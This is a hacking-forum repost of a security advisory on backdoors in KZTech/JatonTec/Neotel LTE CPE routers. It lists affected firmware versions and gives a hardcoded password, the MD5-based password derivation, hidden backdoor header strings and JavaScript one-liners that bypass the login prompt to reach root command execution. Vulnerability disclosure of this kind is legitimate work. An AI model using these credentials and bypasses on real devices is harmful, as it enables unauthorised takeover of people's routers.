跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution


HACK1949

推荐的帖子

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device has several backdoors and hidden pages that
allow remote code execution, overwriting of the bootrom and
enabling debug mode.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php


03.02.2021

--


Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.

Old models (syscmd.asp) password: super1234

Newer models (syscmd.html) password: md5(WAN_MAC+version):

$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}

...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
  if (*pcVar6 == 0) {
    pcVar6 = "6C:AD:EF:00:00:01";
  }
  memset(acStack280,0,0x100);
  sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
  ...
  psMd5Init(auStack112);
  psMd5Update(auStack112,local_10,local_c);
  psMd5Final(auStack112,uParm1);
  return;
...


Another 2 backdoors exist using the websCheckCookie() and specific header strings.

...
      iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
      if (iVar2 != 0) {
        return 0xffffffff;
      }
      if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
         (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
        return 0xffffffff;
        ...
        if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
    WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
    __n = strlen(__s1);
    if (__n == 0) {
      snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
      WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
      system(acStack1560);
      websWrite(iParm1,"invalid command!");
      goto LAB_0047c3f8;
    }
...


Bypass the backdoor password request and enable debug mode from within the web console:

$('#div_check').modal('hide');  <--- syscmd.html

g_password_check_alert.close(); <--- syscmd.asp
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...